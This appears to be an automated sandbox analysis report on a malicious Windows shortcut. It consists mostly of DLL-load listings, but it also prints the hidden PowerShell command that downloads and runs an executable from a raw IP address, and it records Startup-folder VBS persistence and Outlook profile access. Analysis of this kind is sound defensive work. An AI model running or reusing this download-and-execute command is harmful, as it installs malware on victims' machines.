                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: ORDER-202577008.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000003.00000002.2301533818.0000000003931000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2306539593.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000003.00000002.2301533818.0000000003A5A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000003.00000002.2301533818.0000000003931000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2306539593.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000003.00000002.2301533818.0000000003A5A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: file.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                Suspicious powershell command line found
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
                Yara detected Costura Assembly Loader
                Source: Yara matchFile source: 3.2.file.exe.6860000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.file.exe.6860000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2281972613.000000000297C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2547706995.000000000241C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2314157262.0000000006860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3136, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: TypeId.exe PID: 1088, type: MEMORYSTR
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF848F34583 push eax; iretd 1_2_00007FF848F3459D
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_07186551 push es; iretd 3_2_07186557
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_022B95F3 push 022Bh; ret 6_2_022B9600
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E94ED0 push A40507C6h; ret 6_2_05E94ED5
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9805E push esi; ret 6_2_05E9805F
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9325A push ecx; iretd 6_2_05E9325D
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 8_2_06A26551 push es; iretd 8_2_06A26557
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 10_2_00E995FC push 00E9h; ret 10_2_00E99600

                Persistence and Installation Behavior

                barindex
                Windows shortcut file (LNK) starts blacklisted processes
                Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Roaming\TypeId.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\file.exeJump to dropped file

                Boot Survival

                barindex
                Drops VBS files to the startup folder
                Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbsJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
